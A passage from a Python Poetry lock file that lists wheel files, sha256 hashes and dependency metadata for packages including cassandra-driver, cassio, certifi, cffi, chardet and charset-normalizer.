    {file = "cassandra_driver-3.28.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f1dc54edf3b664dc8e45a9c8fed163dacbad8bc92c788c84a371ccb700e18638"},
    {file = "cassandra_driver-3.28.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e383aff200b7194d0d5625bf162bbc8471d05db7163c546341e5f27b36b53134"},
    {file = "cassandra_driver-3.28.0-cp37-cp37m-win32.whl", hash = "sha256:a5e8b066f816868b344c108f34acc04b53c44caed2cdbcfe08ebdcbc1fd35046"},
    {file = "cassandra_driver-3.28.0-cp37-cp37m-win_amd64.whl", hash = "sha256:ae8c8e9a46e1b0174ace1e836d4ea97292aa6de509db0def0f816322468fb430"},
    {file = "cassandra_driver-3.28.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:d5e8cf7db955b113f51274f166be9db0f0a06620c894abc41159828f0aeda259"},
    {file = "cassandra_driver-3.28.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:26cbdb0d04f749b78bf7de17fd6a713b90430d1c70d8aa442845d51db823b9eb"},
    {file = "cassandra_driver-3.28.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:fe302940780932d83414ad5282c8a6bd72b248f3b1fceff995f28c77a6ebc925"},
    {file = "cassandra_driver-3.28.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3694c1e19d310668f5a60c16511fb12c3ad4c387d089a8080b74239a916620fb"},
    {file = "cassandra_driver-3.28.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9f5690b7b121e82c4365d298bd49dc574ecd8eed3ec0bafdf43fce708f2f992b"},
    {file = "cassandra_driver-3.28.0-cp38-cp38-win32.whl", hash = "sha256:d09c8b0b392064054656050448dece04e4fa890af3c677a2f2034af14983ceb5"},
    {file = "cassandra_driver-3.28.0-cp38-cp38-win_amd64.whl", hash = "sha256:e2342420bae4f80587e2ddebb38ade448c9ab1d210787a8030c1c04f54ef4a84"},
    {file = "cassandra_driver-3.28.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:c8d934cb7eac6586823a7eb69d40019154fd8e7d640bfaed49ac7edc373578df"},
    {file = "cassandra_driver-3.28.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8b51805d57ff6ed73a95c83c25d0479391da28c765c2bf019ee1370d8ca64cd0"},
    {file = "cassandra_driver-3.28.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:5f05495ccabe5be046bb9f1c2cc3e3ff696a94fd4f2f2b1004c951e56b1ea38d"},
    {file = "cassandra_driver-3.28.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:59050666423c4ffdda9626676c18cce83a71c8331dd3d99f6b9306e0941348cf"},
    {file = "cassandra_driver-3.28.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a665841c15f2fade6b00a8404d3424fed8757971b75e791b69bfedacc4753f7c"},
{file = "cassandra_driver-3.28.0-cp39-cp39-win32.whl", hash = "sha256:46433de332b8ef59ad44140f287b584303b90111cf6f355ec8c990830135dd21"}, {file = "cassandra_driver-3.28.0-cp39-cp39-win_amd64.whl", hash = "sha256:5e6213f10d58b05a6120bcff4f479d89c152d3f4ba43b3bda3283ee67c3abe23"}, ] [package.dependencies] geomet = ">=0.1,<0.3" six = ">=1.9" [package.extras] cle = ["cryptography (>=35.0)"] graph = ["gremlinpython (==3.4.6)"] [[package]] name = "cassio" version = "0.1.3" description = "A framework-agnostic Python library to seamlessly integrate Apache Cassandra(R) with ML/LLM/genAI workloads." optional = false python-versions = ">=3.8" files = [ {file = "cassio-0.1.3-py3-none-any.whl", hash = "sha256:2ced5b7e5c6e58b7b4647388d8629c77fdb9a8d745f8763e7e87d1da924ff0f1"}, {file = "cassio-0.1.3.tar.gz", hash = "sha256:dbea30c1aa3014205fd48e036d2bcc8ba949e8b3f3351ca9cef698665cb40a18"}, ] [package.dependencies] cassandra-driver = ">=3.28.0" numpy = ">=1.0" requests = ">=2" [[package]] name = "certifi" version = "2023.7.22" description = "Python package for providing Mozilla's CA Bundle." optional = false python-versions = ">=3.6" files = [ {file = "certifi-2023.7.22-py3-none-any.whl", hash = "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9"}, {file = "certifi-2023.7.22.tar.gz", hash = "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082"}, ] [[package]] name = "cffi" version = "1.16.0" description = "Foreign Function Interface for Python calling C code." optional = false python-versions = ">=3.8" files = [ {file = "cffi-1.16.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:6b3d6606d369fc1da4fd8c357d026317fbb9c9b75d36dc16e90e84c26854b088"}, {file = "cffi-1.16.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ac0f5edd2360eea2f1daa9e26a41db02dd4b0451b48f7c318e217ee092a213e9"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7e61e3e4fa664a8588aa25c883eab612a188c725755afff6289454d6362b9673"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a72e8961a86d19bdb45851d8f1f08b041ea37d2bd8d4fd19903bc3083d80c896"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5b50bf3f55561dac5438f8e70bfcdfd74543fd60df5fa5f62d94e5867deca684"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7651c50c8c5ef7bdb41108b7b8c5a83013bfaa8a935590c5d74627c047a583c7"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e4108df7fe9b707191e55f33efbcb2d81928e10cea45527879a4749cbe472614"}, {file = "cffi-1.16.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:32c68ef735dbe5857c810328cb2481e24722a59a2003018885514d4c09af9743"}, {file = "cffi-1.16.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:673739cb539f8cdaa07d92d02efa93c9ccf87e345b9a0b556e3ecc666718468d"}, {file = "cffi-1.16.0-cp310-cp310-win32.whl", hash = "sha256:9f90389693731ff1f659e55c7d1640e2ec43ff725cc61b04b2f9c6d8d017df6a"}, {file = "cffi-1.16.0-cp310-cp310-win_amd64.whl", hash = "sha256:e6024675e67af929088fda399b2094574609396b1decb609c55fa58b028a32a1"}, {file = "cffi-1.16.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b84834d0cf97e7d27dd5b7f3aca7b6e9263c56308ab9dc8aae9784abb774d404"}, {file = "cffi-1.16.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1b8ebc27c014c59692bb2664c7d13ce7a6e9a629be20e54e7271fa696ff2b417"}, {file = 
"cffi-1.16.0-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ee07e47c12890ef248766a6e55bd38ebfb2bb8edd4142d56db91b21ea68b7627"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d8a9d3ebe49f084ad71f9269834ceccbf398253c9fac910c4fd7053ff1386936"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e70f54f1796669ef691ca07d046cd81a29cb4deb1e5f942003f401c0c4a2695d"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5bf44d66cdf9e893637896c7faa22298baebcd18d1ddb6d2626a6e39793a1d56"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7b78010e7b97fef4bee1e896df8a4bbb6712b7f05b7ef630f9d1da00f6444d2e"}, {file = "cffi-1.16.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:c6a164aa47843fb1b01e941d385aab7215563bb8816d80ff3a363a9f8448a8dc"}, {file = "cffi-1.16.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e09f3ff613345df5e8c3667da1d918f9149bd623cd9070c983c013792a9a62eb"}, {file = "cffi-1.16.0-cp311-cp311-win32.whl", hash = "sha256:2c56b361916f390cd758a57f2e16233eb4f64bcbeee88a4881ea90fca14dc6ab"}, {file = "cffi-1.16.0-cp311-cp311-win_amd64.whl", hash = "sha256:db8e577c19c0fda0beb7e0d4e09e0ba74b1e4c092e0e40bfa12fe05b6f6d75ba"}, {file = "cffi-1.16.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:fa3a0128b152627161ce47201262d3140edb5a5c3da88d73a1b790a959126956"}, {file = "cffi-1.16.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:68e7c44931cc171c54ccb702482e9fc723192e88d25a0e133edd7aff8fcd1f6e"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:abd808f9c129ba2beda4cfc53bde801e5bcf9d6e0f22f095e45327c038bfe68e"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:88e2b3c14bdb32e440be531ade29d3c50a1a59cd4e51b1dd8b0865c54ea5d2e2"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:fcc8eb6d5902bb1cf6dc4f187ee3ea80a1eba0a89aba40a5cb20a5087d961357"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b7be2d771cdba2942e13215c4e340bfd76398e9227ad10402a8767ab1865d2e6"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e715596e683d2ce000574bae5d07bd522c781a822866c20495e52520564f0969"}, {file = "cffi-1.16.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:2d92b25dbf6cae33f65005baf472d2c245c050b1ce709cc4588cdcdd5495b520"}, {file = "cffi-1.16.0-cp312-cp312-win32.whl", hash = "sha256:b2ca4e77f9f47c55c194982e10f058db063937845bb2b7a86c84a6cfe0aefa8b"}, {file = "cffi-1.16.0-cp312-cp312-win_amd64.whl", hash = "sha256:68678abf380b42ce21a5f2abde8efee05c114c2fdb2e9eef2efdb0257fba1235"}, {file = "cffi-1.16.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0c9ef6ff37e974b73c25eecc13952c55bceed9112be2d9d938ded8e856138bcc"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a09582f178759ee8128d9270cd1344154fd473bb77d94ce0aeb2a93ebf0feaf0"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e760191dd42581e023a68b758769e2da259b5d52e3103c6060ddc02c9edb8d7b"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = 
"sha256:80876338e19c951fdfed6198e70bc88f1c9758b94578d5a7c4c91a87af3cf31c"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a6a14b17d7e17fa0d207ac08642c8820f84f25ce17a442fd15e27ea18d67c59b"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6602bc8dc6f3a9e02b6c22c4fc1e47aa50f8f8e6d3f78a5e16ac33ef5fefa324"}, {file = "cffi-1.16.0-cp38-cp38-win32.whl", hash = "sha256:131fd094d1065b19540c3d72594260f118b231090295d8c34e19a7bbcf2e860a"}, {file = "cffi-1.16.0-cp38-cp38-win_amd64.whl", hash = "sha256:31d13b0f99e0836b7ff893d37af07366ebc90b678b6664c955b54561fc36ef36"}, {file = "cffi-1.16.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:582215a0e9adbe0e379761260553ba11c58943e4bbe9c36430c4ca6ac74b15ed"}, {file = "cffi-1.16.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b29ebffcf550f9da55bec9e02ad430c992a87e5f512cd63388abb76f1036d8d2"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dc9b18bf40cc75f66f40a7379f6a9513244fe33c0e8aa72e2d56b0196a7ef872"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cb4a35b3642fc5c005a6755a5d17c6c8b6bcb6981baf81cea8bfbc8903e8ba8"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b86851a328eedc692acf81fb05444bdf1891747c25af7529e39ddafaf68a4f3f"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c0f31130ebc2d37cdd8e44605fb5fa7ad59049298b3f745c74fa74c62fbfcfc4"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f8e709127c6c77446a8c0a8c8bf3c8ee706a06cd44b1e827c3e6a2ee6b8c098"}, {file = "cffi-1.16.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:748dcd1e3d3d7cd5443ef03ce8685043294ad6bd7c02a38d1bd367cfd968e000"}, {file = "cffi-1.16.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8895613bcc094d4a1b2dbe179d88d7fb4a15cee43c052e8885783fac397d91fe"}, {file = "cffi-1.16.0-cp39-cp39-win32.whl", hash = "sha256:ed86a35631f7bfbb28e108dd96773b9d5a6ce4811cf6ea468bb6a359b256b1e4"}, {file = "cffi-1.16.0-cp39-cp39-win_amd64.whl", hash = "sha256:3686dffb02459559c74dd3d81748269ffb0eb027c39a6fc99502de37d501faa8"}, {file = "cffi-1.16.0.tar.gz", hash = "sha256:bcb3ef43e58665bbda2fb198698fcae6776483e0c4a631aa5647806c25e02cc0"}, ] [package.dependencies] pycparser = "*" [[package]] name = "chardet" version = "5.2.0" description = "Universal encoding detector for Python 3" optional = true python-versions = ">=3.7" files = [ {file = "chardet-5.2.0-py3-none-any.whl", hash = "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970"}, {file = "chardet-5.2.0.tar.gz", hash = "sha256:1b3b6ff479a8c414bc3fa2c0852995695c4a026dcd6d0633b2dd092ca39c1cf7"}, ] [[package]] name = "charset-normalizer" version = "3.3.1" description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." 
optional = false python-versions = ">=3.7.0" files = [ {file = "charset-normalizer-3.3.1.tar.gz", hash = "sha256:d9137a876020661972ca6eec0766d81aef8a5627df628b664b234b73396e727e"}, {file = "charset_normalizer-3.3.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8aee051c89e13565c6bd366813c386939f8e928af93c29fda4af86d25b73d8f8"}, {file = "charset_normalizer-3.3.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:352a88c3df0d1fa886562384b86f9a9e27563d4704ee0e9d56ec6fcd270ea690"}, {file = "charset_normalizer-3.3.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:223b4d54561c01048f657fa6ce41461d5ad8ff128b9678cfe8b2ecd951e3f8a2"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4f861d94c2a450b974b86093c6c027888627b8082f1299dfd5a4bae8e2292821"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1171ef1fc5ab4693c5d151ae0fdad7f7349920eabbaca6271f95969fa0756c2d"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:28f512b9a33235545fbbdac6a330a510b63be278a50071a336afc1b78781b147"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c0e842112fe3f1a4ffcf64b06dc4c61a88441c2f02f373367f7b4c1aa9be2ad5"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3f9bc2ce123637a60ebe819f9fccc614da1bcc05798bbbaf2dd4ec91f3e08846"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:f194cce575e59ffe442c10a360182a986535fd90b57f7debfaa5c845c409ecc3"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:9a74041ba0bfa9bc9b9bb2cd3238a6ab3b7618e759b41bd15b5f6ad958d17605"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:b578cbe580e3b41ad17b1c428f382c814b32a6ce90f2d8e39e2e635d49e498d1"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:6db3cfb9b4fcecb4390db154e75b49578c87a3b9979b40cdf90d7e4b945656e1"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:debb633f3f7856f95ad957d9b9c781f8e2c6303ef21724ec94bea2ce2fcbd056"}, {file = "charset_normalizer-3.3.1-cp310-cp310-win32.whl", hash = "sha256:87071618d3d8ec8b186d53cb6e66955ef2a0e4fa63ccd3709c0c90ac5a43520f"}, {file = "charset_normalizer-3.3.1-cp310-cp310-win_amd64.whl", hash = "sha256:e372d7dfd154009142631de2d316adad3cc1c36c32a38b16a4751ba78da2a397"}, {file = "charset_normalizer-3.3.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ae4070f741f8d809075ef697877fd350ecf0b7c5837ed68738607ee0a2c572cf"}, {file = "charset_normalizer-3.3.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:58e875eb7016fd014c0eea46c6fa92b87b62c0cb31b9feae25cbbe62c919f54d"}, {file = "charset_normalizer-3.3.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:dbd95e300367aa0827496fe75a1766d198d34385a58f97683fe6e07f89ca3e3c"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:de0b4caa1c8a21394e8ce971997614a17648f94e1cd0640fbd6b4d14cab13a72"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:985c7965f62f6f32bf432e2681173db41336a9c2611693247069288bcb0c7f8b"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", 
hash = "sha256:a15c1fe6d26e83fd2e5972425a772cca158eae58b05d4a25a4e474c221053e2d"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ae55d592b02c4349525b6ed8f74c692509e5adffa842e582c0f861751701a673"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:be4d9c2770044a59715eb57c1144dedea7c5d5ae80c68fb9959515037cde2008"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:851cf693fb3aaef71031237cd68699dded198657ec1e76a76eb8be58c03a5d1f"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:31bbaba7218904d2eabecf4feec0d07469284e952a27400f23b6628439439fa7"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:871d045d6ccc181fd863a3cd66ee8e395523ebfbc57f85f91f035f50cee8e3d4"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:501adc5eb6cd5f40a6f77fbd90e5ab915c8fd6e8c614af2db5561e16c600d6f3"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:f5fb672c396d826ca16a022ac04c9dce74e00a1c344f6ad1a0fdc1ba1f332213"}, {file = "charset_normalizer-3.3.1-cp311-cp311-win32.whl", hash = "sha256:bb06098d019766ca16fc915ecaa455c1f1cd594204e7f840cd6258237b5079a8"}, {file = "charset_normalizer-3.3.1-cp311-cp311-win_amd64.whl", hash = "sha256:8af5a8917b8af42295e86b64903156b4f110a30dca5f3b5aedea123fbd638bff"}, {file = "charset_normalizer-3.3.1-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:7ae8e5142dcc7a49168f4055255dbcced01dc1714a90a21f87448dc8d90617d1"}, {file = "charset_normalizer-3.3.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:5b70bab78accbc672f50e878a5b73ca692f45f5b5e25c8066d748c09405e6a55"}, {file = "charset_normalizer-3.3.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:5ceca5876032362ae73b83347be8b5dbd2d1faf3358deb38c9c88776779b2e2f"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:34d95638ff3613849f473afc33f65c401a89f3b9528d0d213c7037c398a51296"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9edbe6a5bf8b56a4a84533ba2b2f489d0046e755c29616ef8830f9e7d9cf5728"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6a02a3c7950cafaadcd46a226ad9e12fc9744652cc69f9e5534f98b47f3bbcf"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:10b8dd31e10f32410751b3430996f9807fc4d1587ca69772e2aa940a82ab571a"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:edc0202099ea1d82844316604e17d2b175044f9bcb6b398aab781eba957224bd"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:b891a2f68e09c5ef989007fac11476ed33c5c9994449a4e2c3386529d703dc8b"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:71ef3b9be10070360f289aea4838c784f8b851be3ba58cf796262b57775c2f14"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:55602981b2dbf8184c098bc10287e8c245e351cd4fdcad050bd7199d5a8bf514"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:46fb9970aa5eeca547d7aa0de5d4b124a288b42eaefac677bde805013c95725c"}, {file = 
"charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:520b7a142d2524f999447b3a0cf95115df81c4f33003c51a6ab637cbda9d0bf4"}, {file = "charset_normalizer-3.3.1-cp312-cp312-win32.whl", hash = "sha256:8ec8ef42c6cd5856a7613dcd1eaf21e5573b2185263d87d27c8edcae33b62a61"}, {file = "charset_normalizer-3.3.1-cp312-cp312-win_amd64.whl", hash = "sha256:baec8148d6b8bd5cee1ae138ba658c71f5b03e0d69d5907703e3e1df96db5e41"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:63a6f59e2d01310f754c270e4a257426fe5a591dc487f1983b3bbe793cf6bac6"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d6bfc32a68bc0933819cfdfe45f9abc3cae3877e1d90aac7259d57e6e0f85b1"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4f3100d86dcd03c03f7e9c3fdb23d92e32abbca07e7c13ebd7ddfbcb06f5991f"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:39b70a6f88eebe239fa775190796d55a33cfb6d36b9ffdd37843f7c4c1b5dc67"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4e12f8ee80aa35e746230a2af83e81bd6b52daa92a8afaef4fea4a2ce9b9f4fa"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b6cefa579e1237ce198619b76eaa148b71894fb0d6bcf9024460f9bf30fd228"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:61f1e3fb621f5420523abb71f5771a204b33c21d31e7d9d86881b2cffe92c47c"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:4f6e2a839f83a6a76854d12dbebde50e4b1afa63e27761549d006fa53e9aa80e"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:1ec937546cad86d0dce5396748bf392bb7b62a9eeb8c66efac60e947697f0e58"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:82ca51ff0fc5b641a2d4e1cc8c5ff108699b7a56d7f3ad6f6da9dbb6f0145b48"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:633968254f8d421e70f91c6ebe71ed0ab140220469cf87a9857e21c16687c034"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-win32.whl", hash = "sha256:c0c72d34e7de5604df0fde3644cc079feee5e55464967d10b24b1de268deceb9"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-win_amd64.whl", hash = "sha256:63accd11149c0f9a99e3bc095bbdb5a464862d77a7e309ad5938fbc8721235ae"}, {file = "charset_normalizer-3.3.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5a3580a4fdc4ac05f9e53c57f965e3594b2f99796231380adb2baaab96e22761"}, {file = "charset_normalizer-3.3.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2465aa50c9299d615d757c1c888bc6fef384b7c4aec81c05a0172b4400f98557"}, {file = "charset_normalizer-3.3.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:cb7cd68814308aade9d0c93c5bd2ade9f9441666f8ba5aa9c2d4b389cb5e2a45"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:91e43805ccafa0a91831f9cd5443aa34528c0c3f2cc48c4cb3d9a7721053874b"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:854cc74367180beb327ab9d00f964f6d91da06450b0855cbbb09187bcdb02de5"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c15070ebf11b8b7fd1bfff7217e9324963c82dbdf6182ff7050519e350e7ad9f"}, 
{file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2c4c99f98fc3a1835af8179dcc9013f93594d0670e2fa80c83aa36346ee763d2"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3fb765362688821404ad6cf86772fc54993ec11577cd5a92ac44b4c2ba52155b"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:dced27917823df984fe0c80a5c4ad75cf58df0fbfae890bc08004cd3888922a2"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:a66bcdf19c1a523e41b8e9d53d0cedbfbac2e93c649a2e9502cb26c014d0980c"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:ecd26be9f112c4f96718290c10f4caea6cc798459a3a76636b817a0ed7874e42"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:3f70fd716855cd3b855316b226a1ac8bdb3caf4f7ea96edcccc6f484217c9597"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:17a866d61259c7de1bdadef418a37755050ddb4b922df8b356503234fff7932c"}, {file = 